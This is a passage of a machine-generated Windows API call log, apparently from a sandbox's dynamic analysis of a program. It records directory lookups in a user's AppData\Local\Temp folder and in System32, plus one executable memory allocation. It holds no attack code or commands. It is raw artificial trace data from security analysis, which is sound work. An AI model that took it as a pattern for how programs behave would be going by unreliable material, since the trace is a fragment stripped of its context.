FindNextFileW (in: hFindFile=0x108c6f8, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0 [0164.167] GetLastError () returned 0x12 [0164.167] FindClose (in: hFindFile=0x108c6f8 | out: hFindFile=0x108c6f8) returned 1 [0164.168] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\", psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj") returned 1 [0164.168] SysReAllocStringLen (in: pbstr=0x28fe64*="c:\\Users\\kEecfMwgj", psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28fe64*="c:\\Users\\kEecfMwgj\\") returned 1 [0164.168] SysReAllocStringLen (in: pbstr=0x28fae8*="keecfm~1", psz="appdata", len=0x7 | out: pbstr=0x28fae8*="appdata") returned 1 [0164.168] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\appdata" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0x108c6f8 [0164.168] FindNextFileW (in: hFindFile=0x108c6f8, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0 [0164.168] GetLastError () returned 0x12 [0164.168] FindClose (in: hFindFile=0x108c6f8 | out: hFindFile=0x108c6f8) returned 1 [0164.169] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\", psz="c:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData") returned 1 [0164.169] SysReAllocStringLen (in: pbstr=0x28fe64*="c:\\Users\\kEecfMwgj\\AppData", psz="c:\\Users\\kEecfMwgj\\AppData\\", len=0x1b | out: pbstr=0x28fe64*="c:\\Users\\kEecfMwgj\\AppData\\") returned 1 [0164.169] SysReAllocStringLen (in: pbstr=0x28fae8*="appdata", psz="local", len=0x5 | out: pbstr=0x28fae8*="local") returned 1 [0164.169] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\local" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0x108c6f8 [0164.169] FindNextFileW (in: hFindFile=0x108c6f8, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0 [0164.170] GetLastError () returned 0x12 [0164.170] FindClose (in: hFindFile=0x108c6f8 | out: hFindFile=0x108c6f8) returned 1 [0164.170] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local", len=0x20 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local") returned 1 [0164.170] SysReAllocStringLen (in: pbstr=0x28fe64*="c:\\Users\\kEecfMwgj\\AppData\\Local", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\", len=0x21 | out: pbstr=0x28fe64*="c:\\Users\\kEecfMwgj\\AppData\\Local\\") returned 1 [0164.170] SysReAllocStringLen (in: pbstr=0x28fae8*="local", psz="temp", len=0x4 | out: pbstr=0x28fae8*="temp") returned 1 [0164.170] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\Local\\temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf38c1580, ftLastAccessTime.dwHighDateTime=0x1da9884, ftLastWriteTime.dwLowDateTime=0xf38c1580, ftLastWriteTime.dwHighDateTime=0x1da9884, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0x108c6f8 [0164.171] FindNextFileW (in: hFindFile=0x108c6f8, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf38c1580, ftLastAccessTime.dwHighDateTime=0x1da9884, ftLastWriteTime.dwLowDateTime=0xf38c1580, ftLastWriteTime.dwHighDateTime=0x1da9884, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0164.171] GetLastError () returned 0x12 [0164.171] FindClose (in: hFindFile=0x108c6f8 | out: hFindFile=0x108c6f8) returned 1 [0164.171] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", len=0x25 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp") returned 1 [0164.171] SysReAllocStringLen (in: pbstr=0x28fe64*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", len=0x26 | out: pbstr=0x28fe64*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\") returned 1 [0164.173] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", len=0x26 | out: pbstr=0x28fad8*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\") returned 1 [0164.173] SysReAllocStringLen (in: pbstr=0x28fe64*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", len=0x25 | out: pbstr=0x28fe64*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp") returned 1 [0164.173] SysReAllocStringLen (in: pbstr=0x28fe68*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", len=0x25 | out: pbstr=0x28fe68*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp") returned 1 [0164.173] SysReAllocStringLen (in: pbstr=0x2b10060*="c:\\users\\keecfm~1\\appdata\\local\\temp\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", len=0x26 | out: pbstr=0x2b10060*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\") returned 1 [0164.174] VirtualAlloc (lpAddress=0x2b14000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x40) returned 0x2b14000 [0164.180] GetSystemDirectoryW (in: lpBuffer=0x2b13b58, uSize=0xfffe | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0164.181] CharLowerBuffW (in: lpsz="C:\\Windows\\system32", cchLength=0x13 | out: lpsz="c:\\windows\\system32") returned 0x13 [0164.181] SysReAllocStringLen (in: pbstr=0x2b23b60*=0x0, psz="c:\\windows\\system32", len=0x13 | out: pbstr=0x2b23b60*="c:\\windows\\system32") returned 1 [0164.181] SysReAllocStringLen (in: pbstr=0x2b23b64*=0x0, psz="c:", len=0x2 | out: pbstr=0x2b23b64*="c:") returned 1 [0164.182] SysReAllocStringLen (in: pbstr=0x2ad0834*=0x0, psz="windows", len=0x7 | out: pbstr=0x2ad0834*="windows") returned 1 [0164.182] SysReAllocStringLen (in: pbstr=0x2b23b98*=0x0, psz="system32", len=0x8 | out: pbstr=0x2b23b98*="system32") returned 1 [0164.183] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0164.183] SysReAllocStringLen (in: pbstr=0x28fe58*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fe58*="c:\\") returned 1 [0164.183] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="windows", len=0x7 | out: pbstr=0x28fae8*="windows") returned 1 [0164.183] FindFirstFileW (in: lpFileName="c:\\windows" (normalized: "c:\\windows"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf9061f60, ftLastAccessTime.dwHighDateTime=0x1da9884, ftLastWriteTime.dwLowDateTime=0xf9061f60, ftLastWriteTime.dwHighDateTime=0x1da9884, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x108f2c0 [0164.184] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf9061f60, ftLastAccessTime.dwHighDateTime=0x1da9884, ftLastWriteTime.dwLowDateTime=0xf9061f60, ftLastWriteTime.dwHighDateTime=0x1da9884, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0164.184] GetLastError () returned 0x12 [0164.184] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.184] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Windows", len=0xa | out: pbstr=0x28fadc*="c:\\Windows") returned 1 [0164.184] SysReAllocStringLen (in: pbstr=0x28fe58*="c:\\Windows", psz="c:\\Windows\\", len=0xb | out: pbstr=0x28fe58*="c:\\Windows\\") returned 1 [0164.184] SysReAllocStringLen (in: pbstr=0x28fae8*="windows", psz="system32", len=0x8 | out: pbstr=0x28fae8*="system32") returned 1 [0164.185] FindFirstFileW (in: lpFileName="c:\\Windows\\system32" (normalized: "c:\\windows\\system32"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x30822e60, ftLastAccessTime.dwHighDateTime=0x1d99d0a, ftLastWriteTime.dwLowDateTime=0x30822e60, ftLastWriteTime.dwHighDateTime=0x1d99d0a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0x108f2c0 [0164.185] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x30822e60, ftLastAccessTime.dwHighDateTime=0x1d99d0a, ftLastWriteTime.dwLowDateTime=0x30822e60, ftLastWriteTime.dwHighDateTime=0x1d99d0a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0 [0164.185] GetLastError () returned 0x12 [0164.185] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.185] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Windows\\", psz="c:\\Windows\\System32", len=0x13 | out: pbstr=0x28fadc*="c:\\Windows\\System32") returned 1 [0164.186] SysReAllocStringLen (in: pbstr=0x28fe58*="c:\\Windows\\System32", psz="c:\\Windows\\System32\\", len=0x14 | out: pbstr=0x28fe58*="c:\\Windows\\System32\\") returned 1 [0164.186] VirtualFree (lpAddress=0x2b24000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0164.187] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Windows\\System32\\", len=0x14 | out: pbstr=0x28fad8*="c:\\Windows\\System32\\") returned 1 [0164.187] SysReAllocStringLen (in: pbstr=0x28fe58*="c:\\Windows\\System32\\", psz="c:\\Windows\\System32", len=0x13 | out: pbstr=0x28fe58*="c:\\Windows\\System32") returned 1 [0164.188] SysReAllocStringLen (in: pbstr=0x28fe5c*=0x0, psz="c:\\Windows\\System32", len=0x13 | out: pbstr=0x28fe5c*="c:\\Windows\\System32") returned 1 [0164.188] SysReAllocStringLen (in: pbstr=0x2b10058*=0x0, psz="c:\\Windows\\System32\\", len=0x14 | out: pbstr=0x2b10058*="c:\\Windows\\System32\\") returned 1 [0164.188] SysReAllocStringLen (in: pbstr=0x28fe50*=0x0, psz="c:", len=0x2 | out: pbstr=0x28fe50*="c:") returned 1 [0164.188] SysReAllocStringLen (in: pbstr=0x2b1005c*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x2b1005c*="c:\\") returned 1 [0164.188] GetTempPathW (in: nBufferLength=0xfffe, lpBuffer=0x2b13b58 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25 [0164.189] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", cchLength=0x25 | out: lpsz="c:\\users\\keecfm~1\\appdata\\local\\temp\\") returned 0x25 [0164.189] SysReAllocStringLen (in: pbstr=0x2b1009c*=0x0, psz="c:\\users\\keecfm~1\\appdata\\local\\temp\\", len=0x25 | out: pbstr=0x2b1009c*="c:\\users\\keecfm~1\\appdata\\local\\temp\\") returned 1 [0164.189] SysReAllocStringLen (in: pbstr=0x2b100a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x2b100a0*="c:") returned 1 [0164.198] SysReAllocStringLen (in: pbstr=0x2ad0834*=0x0, psz="users", len=0x5 | out: pbstr=0x2ad0834*="users") returned 1 [0164.199] SysReAllocStringLen (in: pbstr=0x2b100d4*=0x0, psz="keecfm~1", len=0x8 | out: pbstr=0x2b100d4*="keecfm~1") returned 1 [0164.199] SysReAllocStringLen (in: pbstr=0x2b100e0*=0x0, psz="appdata", len=0x7 | out: pbstr=0x2b100e0*="appdata") returned 1 [0164.199] SysReAllocStringLen (in: pbstr=0x2b100ec*=0x0, psz="local", len=0x5 | out: pbstr=0x2b100ec*="local") returned 1 [0164.200] SysReAllocStringLen (in: pbstr=0x2b100f8*=0x0, psz="temp", len=0x4 | out: pbstr=0x2b100f8*="temp") returned 1 [0164.200] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0164.200] SysReAllocStringLen (in: pbstr=0x28fe44*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fe44*="c:\\") returned 1 [0164.201] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="users", len=0x5 | out: pbstr=0x28fae8*="users") returned 1 [0164.201] FindFirstFileW (in: lpFileName="c:\\users" (normalized: "c:\\users"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x108f2c0 [0164.201] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0164.201] GetLastError () returned 0x12 [0164.201] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.202] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x28fadc*="c:\\Users") returned 1 [0164.202] SysReAllocStringLen (in: pbstr=0x28fe44*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x28fe44*="c:\\Users\\") returned 1 [0164.202] SysReAllocStringLen (in: pbstr=0x28fae8*="users", psz="keecfm~1", len=0x8 | out: pbstr=0x28fae8*="keecfm~1") returned 1 [0164.202] FindFirstFileW (in: lpFileName="c:\\Users\\keecfm~1" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0x108f2c0 [0164.202] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0 [0164.202] GetLastError () returned 0x12 [0164.202] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.203] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\", psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj") returned 1 [0164.203] SysReAllocStringLen (in: pbstr=0x28fe44*="c:\\Users\\kEecfMwgj", psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28fe44*="c:\\Users\\kEecfMwgj\\") returned 1 [0164.203] SysReAllocStringLen (in: pbstr=0x28fae8*="keecfm~1", psz="appdata", len=0x7 | out: pbstr=0x28fae8*="appdata") returned 1 [0164.203] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\appdata" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0x108f2c0 [0164.204] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0 [0164.204] GetLastError () returned 0x12 [0164.204] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.204] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\", psz="c:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData") returned 1 [0164.204] SysReAllocStringLen (in: pbstr=0x28fe44*="c:\\Users\\kEecfMwgj\\AppData", psz="c:\\Users\\kEecfMwgj\\AppData\\", len=0x1b | out: pbstr=0x28fe44*="c:\\Users\\kEecfMwgj\\AppData\\") returned 1 [0164.204] SysReAllocStringLen (in: pbstr=0x28fae8*="appdata", psz="local", len=0x5 | out: pbstr=0x28fae8*="local") returned 1 [0164.205] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\local" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0x108f2c0 [0164.205] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0 [0164.205] GetLastError () returned 0x12 [0164.205] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.205] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local", len=0x20 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local") returned 1 [0164.205] SysReAllocStringLen (in: pbstr=0x28fe44*="c:\\Users\\kEecfMwgj\\AppData\\Local", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\", len=0x21 | out: pbstr=0x28fe44*="c:\\Users\\kEecfMwgj\\AppData\\Local\\") returned 1 [0164.209] SysReAllocStringLen (in: pbstr=0x28fae8*="local", psz="temp", len=0x4 | out: pbstr=0x28fae8*="temp") returned 1 [0164.210] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\Local\\temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf38c1580, ftLastAccessTime.dwHighDateTime=0x1da9884, ftLastWriteTime.dwLowDateTime=0xf38c1580, ftLastWriteTime.dwHighDateTime=0x1da9884, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0x108f2c0 [0164.210] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf38c1580, ftLastAccessTime.dwHighDateTime=0x1da9884, ftLastWriteTime.dwLowDateTime=0xf38c1580, ftLastWriteTime.dwHighDateTime=0x1da9884, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0164.210] GetLastError () returned 0x12 [0164.210] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.210] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", len=0x25 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp") returned 1 [0164.210] SysReAllocStringLen (in: pbstr=0x28fe44*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", len=0x26 | out: pbstr=0x28fe44*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\") returned 1 [0164.212] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", len=0x26 | out: pbstr=0x28fad8*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\") returned 1 [0164.212] SysReAllocStringLen (in: pbstr=0x28fe44*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", len=0x25 | out: pbstr=0x28fe44*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp") returned 1 [0164.213] SysReAllocStringLen (in: pbstr=0x28fe48*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", len=0x25 | out: pbstr=0x28fe48*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp") returned 1 [0164.213] SysReAllocStringLen (in: pbstr=0x2b10064*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", len=0x26 | out: pbstr=0x2b10064*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\") returned 1 [0164.213] GetWindowsDirectoryW (in: lpBuffer=0x2b13b58, uSize=0xfffe | out: lpBuffer="C:\\Windows") returned 0xa [0164.214] CharLowerBuffW (in: lpsz="C:\\Windows", cchLength=0xa | out: lpsz="c:\\windows") returned 0xa [0164.214] SysReAllocStringLen (in: pbstr=0x2b1009c*=0x0, psz="c:\\windows", len=0xa | out: pbstr=0x2b1009c*="c:\\windows") returned 1 [0164.214] SysReAllocStringLen (in: pbstr=0x2b100a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x2b100a0*="c:") returned 1 [0164.215] SysReAllocStringLen (in: pbstr=0x2ad0834*=0x0, psz="windows", len=0x7 | out: pbstr=0x2ad0834*="windows") returned 1 [0164.215] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0164.216] SysReAllocStringLen (in: pbstr=0x28fe38*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fe38*="c:\\") returned 1 [0164.216] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="windows", len=0x7 | out: pbstr=0x28fae8*="windows") returned 1 [0164.216] FindFirstFileW (in: lpFileName="c:\\windows" (normalized: "c:\\windows"), 